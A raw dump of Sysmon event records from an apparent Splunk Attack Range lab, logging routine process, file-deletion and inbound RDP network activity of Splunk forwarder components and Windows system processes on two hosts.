Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978146Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.363{69CF5F33-8A0C-6151-AF79-00000000FD01}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049481Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:28.085{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63949-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049480Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:29.610{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8FF33CC36FE047DD6BB3A18AE08B7A3,SHA256=C7B3E2A8FB5057887E93BEA7B06556721BC9CE08D3F6E750669BFD4AFA11A6A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049479Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:29.610{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=673F0DC0DE5EAFF3AAEAF17E7000DDEC,SHA256=903378EF969716CC7629BB2D8F88008FEE0E3FEEC8C0858AA836F3063BE5933B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049478Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:29.441{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C247B5E23D48B15DFB3AC29845EAB810,SHA256=8104EB9DD91BD4D7CD893D770AC6A6FCB094C7BC5552B81C3902731A0EC0E3BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978174Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.285{69CF5F33-8A0D-6151-B079-00000000FD01}13721972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978173Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A0D-6151-B079-00000000FD01}1372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978172Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978171Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978170Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978169Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978168Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978167Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978166Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978165Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978164Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978163Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8A0D-6151-B079-00000000FD01}1372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978162Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.081{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A0D-6151-B079-00000000FD01}1372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978161Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.067{69CF5F33-8A0D-6151-B079-00000000FD01}1372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978176Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:30.285{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=254F2AD58451250128D5FA4C350C1D60,SHA256=6E5DBB5500B9CA20E8799CFDBFE7998007D0674A9FF795605D03EAD3528814C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978175Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:30.050{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=420E3BDF3C90248B283BAD554A92D6EA,SHA256=23ECF97D413A98F623655B7B1F1CC9428E9D67CBEC4A0DED6CC5486FCEEA2066,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049483Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:28.902{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53313-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049482Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:30.478{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A57736D5FE4480438D60E67BB7C31103,SHA256=DCA49A349B3AB3451AC3451D93D4FD4A41E2189BD27EE4D29D0546D627404005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978177Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:31.285{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ED215899C5AF841371414EC4C7AA629,SHA256=31B3549FD2A8F5C72B655583F9A04EA61EB88EF22E3A4B4CFB19E1FF1C78776C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049484Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:31.509{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C440CFEFDD54F7780DC3B7CB404A891,SHA256=764ADDCEAB6477058955A249305059DABB1B850C96737038F570B77F40DAD8FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978179Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:32.519{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=613830AC64A9144CF9DAFFFAFB52711F,SHA256=4890AFA7DB7E9898F890685B4DFD46E3942F8E852DB74C00A936FF4CC4BD19E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978178Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:32.394{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3895A452DFF1E0ED2D13EA3DFDE6D550,SHA256=0C7ADE32A2CEBA059869C0A0D054179028E91FDDB45F2809D5D338A40086B447,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049485Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:32.510{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9876F9832237729D6D4347055DFBBDC0,SHA256=C289743CB860CC6CD2DB780FC8994D44EFC1B27D8EE8FA5FECFF3ADE5ACD0275,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049487Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:33.541{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2459191E0AC69D26C1EEEDAF404E9F5,SHA256=CAA0190B32B6D281F04DB7C316D39BD38E2A4262439630C4F70E513FA66A39E3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978183Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:30.806{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59346-false10.0.1.12-8000- 354300x8000000000000000978182Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:29.385{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse110.10.193.201-60524-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978181Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:33.503{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D9DB1E38934A95145D60D79A9EEDD17,SHA256=7A2E49E1291AF81CEDED66CDDF229FA3ADC7E6F58FD1420463BA2830CA4F0275,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978180Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:33.456{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E056CDA25A7D71BB78CDE97A6488A39,SHA256=C8D133D63A30A971557AB3AC3E9AB768B2904D8838B61910F20FE33E213E9709,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049486Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:33.225{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8FF33CC36FE047DD6BB3A18AE08B7A3,SHA256=C7B3E2A8FB5057887E93BEA7B06556721BC9CE08D3F6E750669BFD4AFA11A6A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049491Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:34.961{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7708BD51BEBB8286242BFC10F6C4AF99,SHA256=4DFDF71F05557694726FF32AE01C598BBB17957E5AA8D9EEC8AF637804A69606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049490Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:34.559{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89BBB9833CA7293B5661D5C8C94E01BA,SHA256=DA365435B35CF7B318C93F40316F1350720D01ADF415EAC08B0881FDB4EC99D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978184Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:34.519{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=807EA25D5C6EA628CC31F3A4672D0B97,SHA256=A80442EC36F031FE7B8773D3BE3F4728F9719843AA9A4863A984712DAACCFF5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049489Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:32.370{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58734-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049488Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 